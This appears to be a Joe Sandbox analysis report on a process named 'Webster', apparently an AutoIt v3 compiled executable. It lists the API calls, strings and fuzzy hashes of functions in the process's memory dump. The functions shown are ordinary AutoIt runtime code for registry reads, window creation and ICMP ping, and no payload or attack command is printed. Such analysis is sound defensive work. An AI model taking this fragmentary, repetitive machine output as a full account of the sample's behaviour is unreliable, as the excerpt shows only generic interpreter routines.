                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
                                                                                  • Instruction ID: f31650442481fcaafbbc9c50319c4ef66ceb4bc40a59f4f09c6d35b788c6ce3b
                                                                                  • Opcode Fuzzy Hash: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
                                                                                  • Instruction Fuzzy Hash: 2F21E2B5964209AFDB00EFA5EC88BDDBBF4FB09700F40811AF510A72A0DBB11684CF91
                                                                                  Function 00A92FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A93094), ref: 00AA00ED
                                                                                    • Part of subcall function 00AA08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A9309F), ref: 00AA08E3
                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A930E2
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AD01BA
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AD01FB
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD0239
                                                                                  • _wcscat.LIBCMT ref: 00AD0292
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                  • API String ID: 2673923337-2727554177
                                                                                  • Opcode ID: dafcc4996aeaed6fd04540260d17d78c539d30514357c578f049b4705182fa18
                                                                                  • Instruction ID: b4d01445b2e9865e76340494e6cfc0ab1465e6cf64b3ae3b0a0945baa3ce7a47
                                                                                  • Opcode Fuzzy Hash: dafcc4996aeaed6fd04540260d17d78c539d30514357c578f049b4705182fa18
                                                                                  • Instruction Fuzzy Hash: CC715A755057019EC714EF25E9859AFBBE8FF4A340F80052EF545872A1EFB09A88CB52
                                                                                  Function 00A9514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                                                  • LoadIconW.USER32(00000063), ref: 00A9517C
                                                                                  • LoadIconW.USER32(000000A4), ref: 00A9518E
                                                                                  • LoadIconW.USER32(000000A2), ref: 00A951A0
                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                                                  • RegisterClassExW.USER32(?), ref: 00A9521C
                                                                                    • Part of subcall function 00A83411: GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                    • Part of subcall function 00A83411: RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                    • Part of subcall function 00A83411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                    • Part of subcall function 00A83411: InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                    • Part of subcall function 00A83411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                    • Part of subcall function 00A83411: LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                    • Part of subcall function 00A83411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
                                                                                  • Instruction ID: 0f12deb6287ba2a4e4b12cb53c2ab1202f5c9bb6b6c23168952341082ef5c65a
                                                                                  • Opcode Fuzzy Hash: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
                                                                                  • Instruction Fuzzy Hash: 0F212879A94308AFEB119FA4ED09B9D7BB4FB0A710F00415AF504A72A0DFF55A50CF84
                                                                                  Function 00AF5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00AF5E7E
                                                                                  • inet_addr.WSOCK32(?,?,?), ref: 00AF5EC3
                                                                                  • gethostbyname.WS2_32(?), ref: 00AF5ECF
                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00AF5EDD
                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F4D
                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F63
                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AF5FD8
                                                                                  • WSACleanup.WSOCK32 ref: 00AF5FDE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                  • String ID: Ping
                                                                                  • API String ID: 1028309954-2246546115
                                                                                  • Opcode ID: 804b0456690cbdbcaa4e4508adeb14db34fed00f2d97eeb672ce4d1107c4b559
                                                                                  • Instruction ID: 49832ca743681e398d5ce459e6e5cd36a4fe5a3e921d90acfd4f116fd2791ff4
                                                                                  • Opcode Fuzzy Hash: 804b0456690cbdbcaa4e4508adeb14db34fed00f2d97eeb672ce4d1107c4b559
                                                                                  • Instruction Fuzzy Hash: 9F516C31A04605AFDB20EF74CD49B6AB7E4AF48710F148569FB56DB2A1DB70ED40CB42
                                                                                  Function 00A94D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00A94E22
                                                                                  • KillTimer.USER32(?,00000001), ref: 00A94E4C
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A94E6F
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A94E7A
                                                                                  • CreatePopupMenu.USER32 ref: 00A94E8E
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00A94EAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
                                                                                  • Instruction ID: 897d1774475106063faa261d095eebc406ecf9df7ba4eb654ff79dc35553869b
                                                                                  • Opcode Fuzzy Hash: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
                                                                                  • Instruction Fuzzy Hash: 3141047135820AABEF116F249D4DFFE36E5FB4A300F040615F502922A2CFB49D52D761
                                                                                  Function 00A956F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AD0C5B
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • _memset.LIBCMT ref: 00A95787
                                                                                  • _wcscpy.LIBCMT ref: 00A957DB
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                                                  • __swprintf.LIBCMT ref: 00AD0CD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                  • String ID: Line %d: $AutoIt -
                                                                                  • API String ID: 230667853-4094128768
                                                                                  • Opcode ID: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
                                                                                  • Instruction ID: 5f4a0f08a4b015a5591e3a2f27d045797544370d18fe9267dff2096195fee711
                                                                                  • Opcode Fuzzy Hash: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
                                                                                  • Instruction Fuzzy Hash: 1041C371548301AACB21EBA0DD86FDF77ECAF45350F000A1EF185931A1EF74A648CB96
                                                                                  Function 00A950DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                                                  • ShowWindow.USER32(00000000), ref: 00A9513E
                                                                                  • ShowWindow.USER32(00000000), ref: 00A95147
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  • API String ID: 1584632944-3779509399
                                                                                  • Opcode ID: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
                                                                                  • Instruction ID: a0637f9bec259105b620521c3a0f13a029b7964e14d6ec9da6c4bd32d3abcf45
                                                                                  • Opcode Fuzzy Hash: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
                                                                                  • Instruction Fuzzy Hash: 37F0DA75595294BEEA312B276C48E672E7DE7C7F50F00411AB900A31B0CEF11991DEB0
                                                                                  Function 00AE9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                    • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
                                                                                  • _free.LIBCMT ref: 00AE9C5F
                                                                                  • _free.LIBCMT ref: 00AE9C66
                                                                                  • _free.LIBCMT ref: 00AE9CD1
                                                                                    • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                                                    • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                                                  • _free.LIBCMT ref: 00AE9CD9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                  • API String ID: 1552873950-2806939583
                                                                                  • Opcode ID: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
                                                                                  • Instruction ID: 9361d79e5db46f4447eba50af48875057be6ff3220ae9e5db89c701848403602
                                                                                  • Opcode Fuzzy Hash: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
                                                                                  • Instruction Fuzzy Hash: EC514CB1E04259AFDF24DF65DD41AAEBBB9FF48304F10009EB649A3381DB715A908F58
                                                                                  Function 00AA563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1559183368-0
                                                                                  • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                  • Instruction ID: cb2303f1d3e9c89c51e9e2cccbf7490f827f949af38301549dcfd1a51d3f8236
                                                                                  • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                  • Instruction Fuzzy Hash: 4E51C930E00B05DBDB288F79D98066E77B5AF42320F688B29F835A72D1D7709D509B48
                                                                                  Function 00A852B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8534A
                                                                                  • TranslateMessage.USER32(?), ref: 00A85356
                                                                                  • DispatchMessageW.USER32(?), ref: 00A85360
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1795658109-0
                                                                                  • Opcode ID: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
                                                                                  • Instruction ID: 77a65f453bcd6b79625028ca92479c1dbfad25418a90dcee57b55d6785c5642b
                                                                                  • Opcode Fuzzy Hash: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
                                                                                  • Instruction Fuzzy Hash: 4F31E130D48B069AEB30AB74DC44BF93BF8EB02344F544169E8229B1A1EFE59985E711
                                                                                  Function 00A81284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812A8
                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812C9
                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 3677997916-824357125
                                                                                  • Opcode ID: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
                                                                                  • Instruction ID: 7a66616f99ecb2809d0506002f8ea8a7fea35bb736924be6c380cf63b2d49699
                                                                                  • Opcode Fuzzy Hash: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
                                                                                  • Instruction Fuzzy Hash: FA111875910208BFDB20AFA5DC84EEEBBBCEF05741F508569F805D7110E6719E819BA0
                                                                                  Function 00A95B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A95B58
                                                                                    • Part of subcall function 00A956F8: _memset.LIBCMT ref: 00A95787
                                                                                    • Part of subcall function 00A956F8: _wcscpy.LIBCMT ref: 00A957DB
                                                                                    • Part of subcall function 00A956F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00A95BAD
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A95BBC
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD0D7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1378193009-0
                                                                                  • Opcode ID: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
                                                                                  • Instruction ID: 2434d53b0e052c893afc95c7c01e6df99d43c61fdcfd5c36a04f7902e3e1bffb
                                                                                  • Opcode Fuzzy Hash: 45f1a08b0b2f8c45f3653ea3bb62872d7ac0ce1f0c9540b0b56981c854d1ef12
                                                                                  • Instruction Fuzzy Hash: F421C8709047849FEB738B74C895FEABBECAF02304F44448EE6DA57281D7746984CB51
                                                                                  Function 00A9278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A949C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                                                  • _free.LIBCMT ref: 00ACFB04
                                                                                  • _free.LIBCMT ref: 00ACFB4B
                                                                                    • Part of subcall function 00A929BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A92ADF
                                                                                  Strings
                                                                                  • Bad directive syntax error, xrefs: 00ACFB33
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                  • String ID: Bad directive syntax error
                                                                                  • API String ID: 2861923089-2118420937
                                                                                  • Opcode ID: a34f995608a4b2c8f99fef993f40852f8b52398b1f2e13eec47de2d9b2e265ce
                                                                                  • Instruction ID: ee2f370c5059b831a159cdd7179388dda78d306db24246ec39d44adbb0cf880b
                                                                                  • Opcode Fuzzy Hash: a34f995608a4b2c8f99fef993f40852f8b52398b1f2e13eec47de2d9b2e265ce
                                                                                  • Instruction Fuzzy Hash: E1916B71A10219AFCF04EFA4CD91EEEB7B5BF09350F11456EF816AB2A1DB309A45CB50
                                                                                  Function 00AE9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A94AB2: __fread_nolock.LIBCMT ref: 00A94AD0
                                                                                  • _wcscmp.LIBCMT ref: 00AE9DE1
                                                                                  • _wcscmp.LIBCMT ref: 00AE9DF4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
